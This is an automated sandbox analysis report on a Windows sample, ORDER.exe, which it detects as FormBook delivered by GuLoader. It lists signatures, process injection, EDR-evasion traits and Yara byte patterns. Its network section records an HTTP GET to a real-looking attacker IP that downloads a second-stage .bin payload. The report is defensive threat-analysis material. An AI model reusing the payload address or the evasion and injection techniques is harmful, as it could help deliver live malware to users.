Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ORDER.exe

Overview

General Information

Sample name:ORDER.exe
Analysis ID:1509918
MD5:08d42759644a2b6c75d6e1cdf188bf40
SHA1:c3c6ddce56119679354eddc452ef29151ddf47cd
SHA256:342a7c418f2125aee7a228634841450a97c0b0653c5f9217bd1bb0677a5b14db
Infos:

Detection

FormBook, GuLoader
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
PE / OLE file has an invalid certificate
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64native
  • ORDER.exe (PID: 7600 cmdline: "C:\Users\user\Desktop\ORDER.exe" MD5: 08D42759644A2B6C75D6E1CDF188BF40)
    • ORDER.exe (PID: 3104 cmdline: "C:\Users\user\Desktop\ORDER.exe" MD5: 08D42759644A2B6C75D6E1CDF188BF40)
      • RAVCpl64.exe (PID: 4652 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000003.00000002.32881458791.0000000032090000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.32881458791.0000000032090000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bb70:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13e5f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000000.00000002.32236386433.00000000050E4000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      No Sigma rule has matched
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-09-12T10:16:32.598718+020028032702Potentially Bad Traffic192.168.11.2049736107.150.19.14180TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: ORDER.exeVirustotal: Detection: 20%Perma Link
      Source: Yara matchFile source: 00000003.00000002.32881458791.0000000032090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: ORDER.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: ORDER.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: ORDER.exe, 00000003.00000001.32174271412.0000000000649000.00000020.00000001.01000000.00000008.sdmp
      Source: Binary string: wntdll.pdbUGP source: ORDER.exe, 00000003.00000003.32254123213.000000003209F000.00000004.00000020.00020000.00000000.sdmp, ORDER.exe, 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, ORDER.exe, 00000003.00000003.32257379094.000000003224B000.00000004.00000020.00020000.00000000.sdmp, ORDER.exe, 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: ORDER.exe, ORDER.exe, 00000003.00000003.32254123213.000000003209F000.00000004.00000020.00020000.00000000.sdmp, ORDER.exe, 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, ORDER.exe, 00000003.00000003.32257379094.000000003224B000.00000004.00000020.00020000.00000000.sdmp, ORDER.exe, 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: ORDER.exe, 00000003.00000001.32174271412.0000000000649000.00000020.00000001.01000000.00000008.sdmp
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 0_2_0040603A FindFirstFileA,FindClose,0_2_0040603A
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 0_2_004055F6 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,0_2_004055F6
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 0_2_00402645 FindFirstFileA,0_2_00402645
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49736 -> 107.150.19.141:80
      Source: global trafficHTTP traffic detected: GET /ZngvhChQIdIscdxVPVXD182.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 107.150.19.141Cache-Control: no-cache
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.19.141
      Source: global trafficHTTP traffic detected: GET /ZngvhChQIdIscdxVPVXD182.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 107.150.19.141Cache-Control: no-cache
      Source: ORDER.exe, 00000003.00000002.32870989524.0000000002310000.00000004.00000020.00020000.00000000.sdmp, ORDER.exe, 00000003.00000003.32255056072.0000000002321000.00000004.00000020.00020000.00000000.sdmp, ORDER.exe, 00000003.00000003.32516640693.0000000002321000.00000004.00000020.00020000.00000000.sdmp, ORDER.exe, 00000003.00000003.32516873617.0000000002310000.00000004.00000020.00020000.00000000.sdmp, ORDER.exe, 00000003.00000003.32254813697.000000000231F000.00000004.00000020.00020000.00000000.sdmp, ORDER.exe, 00000003.00000002.32870989524.0000000002321000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.150.19.141/
      Source: ORDER.exe, 00000003.00000002.32870989524.00000000022EE000.00000004.00000020.00020000.00000000.sdmp, ORDER.exe, 00000003.00000003.32516873617.00000000022ED000.00000004.00000020.00020000.00000000.sdmp, ORDER.exe, 00000003.00000002.32871623995.00000000024B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://107.150.19.141/ZngvhChQIdIscdxVPVXD182.bin
      Source: ORDER.exe, 00000003.00000002.32870989524.00000000022EE000.00000004.00000020.00020000.00000000.sdmp, ORDER.exe, 00000003.00000003.32516873617.00000000022ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.150.19.141/ZngvhChQIdIscdxVPVXD182.bin8
      Source: ORDER.exe, 00000003.00000002.32870989524.00000000022EE000.00000004.00000020.00020000.00000000.sdmp, ORDER.exe, 00000003.00000003.32516873617.00000000022ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.150.19.141/ZngvhChQIdIscdxVPVXD182.binP
      Source: ORDER.exe, 00000003.00000002.32870989524.00000000022EE000.00000004.00000020.00020000.00000000.sdmp, ORDER.exe, 00000003.00000003.32516873617.00000000022ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.150.19.141/ZngvhChQIdIscdxVPVXD182.binj
      Source: ORDER.exe, 00000003.00000002.32870989524.00000000022EE000.00000004.00000020.00020000.00000000.sdmp, ORDER.exe, 00000003.00000003.32516873617.00000000022ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.150.19.141/ZngvhChQIdIscdxVPVXD182.bint
      Source: ORDER.exe, 00000003.00000001.32174271412.0000000000649000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
      Source: ORDER.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
      Source: ORDER.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: ORDER.exe, 00000003.00000001.32174271412.0000000000649000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
      Source: ORDER.exe, 00000003.00000001.32174271412.0000000000626000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
      Source: ORDER.exe, 00000003.00000001.32174271412.00000000005F2000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: ORDER.exe, 00000003.00000001.32174271412.00000000005F2000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: ORDER.exe, 00000003.00000001.32174271412.0000000000649000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 0_2_0040515D GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard,0_2_0040515D

      E-Banking Fraud

      barindex
      Source: Yara matchFile source: 00000003.00000002.32881458791.0000000032090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Source: 00000003.00000002.32881458791.0000000032090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: initial sampleStatic PE information: Filename: ORDER.exe
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324634E0 NtCreateMutant,LdrInitializeThunk,3_2_324634E0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32462A80 NtClose,LdrInitializeThunk,3_2_32462A80
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32462BC0 NtQueryInformationToken,LdrInitializeThunk,3_2_32462BC0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32462B90 NtFreeVirtualMemory,LdrInitializeThunk,3_2_32462B90
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32462EB0 NtProtectVirtualMemory,LdrInitializeThunk,3_2_32462EB0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32462D10 NtQuerySystemInformation,LdrInitializeThunk,3_2_32462D10
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32464260 NtSetContextThread,3_2_32464260
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32464570 NtSuspendThread,3_2_32464570
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32462A10 NtWriteFile,3_2_32462A10
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32462AC0 NtEnumerateValueKey,3_2_32462AC0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32462AA0 NtQueryInformationFile,3_2_32462AA0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32462B00 NtQueryValueKey,3_2_32462B00
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32462B10 NtAllocateVirtualMemory,3_2_32462B10
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32462B20 NtQueryInformationProcess,3_2_32462B20
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32462BE0 NtQueryVirtualMemory,3_2_32462BE0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32462B80 NtCreateKey,3_2_32462B80
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324638D0 NtGetContextThread,3_2_324638D0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324629D0 NtWaitForSingleObject,3_2_324629D0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324629F0 NtReadFile,3_2_324629F0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32462E50 NtCreateSection,3_2_32462E50
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 0_2_00403217 EntryPoint,#17,SetErrorMode,OleInitialize,LdrInitializeThunk,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,LdrInitializeThunk,LdrInitializeThunk,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_00403217
      Source: C:\Users\user\Desktop\ORDER.exeFile created: C:\Windows\resources\0409Jump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 0_2_004063100_2_00406310
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 0_2_0040499C0_2_0040499C
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3244D2103_2_3244D210
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241D2EC3_2_3241D2EC
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3243E3103_2_3243E310
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324EF3303_2_324EF330
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324213803_2_32421380
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3243B0D03_2_3243B0D0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324E70F13_2_324E70F1
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3246508C3_2_3246508C
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324200A03_2_324200A0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3247717A3_2_3247717A
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324F010E3_2_324F010E
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241F1133_2_3241F113
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324CD1303_2_324CD130
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324351C03_2_324351C0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324DD6463_2_324DD646
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3243B6503_2_3243B650
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324546703_2_32454670
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3244C6003_2_3244C600
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324CD62C3_2_324CD62C
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324EA6C03_2_324EA6C0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3242C6E03_2_3242C6E0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324A36EC3_2_324A36EC
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324EF6F63_2_324EF6F6
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324306803_2_32430680
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324E67573_2_324E6757
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324327603_2_32432760
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3243A7603_2_3243A760
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324EE7093_2_324EE709
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3242170C3_2_3242170C
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324304453_2_32430445
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3249D4803_2_3249D480
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324EF5C93_2_324EF5C9
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324E75C63_2_324E75C6
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324EEA5B3_2_324EEA5B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324ECA133_2_324ECA13
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324EFA893_2_324EFA89
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32449B403_2_32449B40
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32430B103_2_32430B10
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3246DB193_2_3246DB19
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324EFB2E3_2_324EFB2E
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324A4BC03_2_324A4BC0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3243EB803_2_3243EB80
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324168683_2_32416868
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3244B8703_2_3244B870
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324A58703_2_324A5870
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324EF8723_2_324EF872
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324338003_2_32433800
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245E8103_2_3245E810
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324D08353_2_324D0835
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324328C03_2_324328C0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324E78F33_2_324E78F3
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324468823_2_32446882
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324759C03_2_324759C0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3242E9A03_2_3242E9A0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324EE9A63_2_324EE9A6
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32472E483_2_32472E48
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32450E503_2_32450E50
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324D0E6D3_2_324D0E6D
      Source: C:\Users\user\Desktop\ORDER.exeCode function: String function: 3241B910 appears 187 times
      Source: C:\Users\user\Desktop\ORDER.exeCode function: String function: 3249E692 appears 51 times
      Source: C:\Users\user\Desktop\ORDER.exeCode function: String function: 32477BE4 appears 67 times
      Source: C:\Users\user\Desktop\ORDER.exeCode function: String function: 324AEF10 appears 71 times
      Source: ORDER.exeStatic PE information: invalid certificate
      Source: ORDER.exe, 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesalverede.exeDVarFileInfo$ vs ORDER.exe
      Source: ORDER.exe, 00000003.00000002.32882001004.00000000326C0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ORDER.exe
      Source: ORDER.exe, 00000003.00000003.32257379094.0000000032378000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ORDER.exe
      Source: ORDER.exe, 00000003.00000000.32173309532.0000000000437000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesalverede.exeDVarFileInfo$ vs ORDER.exe
      Source: ORDER.exe, 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ORDER.exe
      Source: ORDER.exe, 00000003.00000003.32254123213.00000000321C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ORDER.exe
      Source: ORDER.exeBinary or memory string: OriginalFilenamesalverede.exeDVarFileInfo$ vs ORDER.exe
      Source: ORDER.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: 00000003.00000002.32881458791.0000000032090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: classification engineClassification label: mal96.troj.evad.winEXE@3/14@0/1
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 0_2_0040442A GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,LdrInitializeThunk,SetDlgItemTextA,0_2_0040442A
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 0_2_00402036 LdrInitializeThunk,LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,0_2_00402036
      Source: C:\Users\user\Desktop\ORDER.exeFile created: C:\Users\user\Videos\legioner.iniJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeFile created: C:\Users\user\AppData\Local\Temp\nsw2DA2.tmpJump to behavior
      Source: ORDER.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\ORDER.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: ORDER.exeVirustotal: Detection: 20%
      Source: C:\Users\user\Desktop\ORDER.exeFile read: C:\Users\user\Desktop\ORDER.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\ORDER.exe "C:\Users\user\Desktop\ORDER.exe"
      Source: C:\Users\user\Desktop\ORDER.exeProcess created: C:\Users\user\Desktop\ORDER.exe "C:\Users\user\Desktop\ORDER.exe"
      Source: C:\Users\user\Desktop\ORDER.exeProcess created: C:\Users\user\Desktop\ORDER.exe "C:\Users\user\Desktop\ORDER.exe"Jump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: iconcodecservice.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: windowscodecs.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: windows.storage.dllJump to behavior
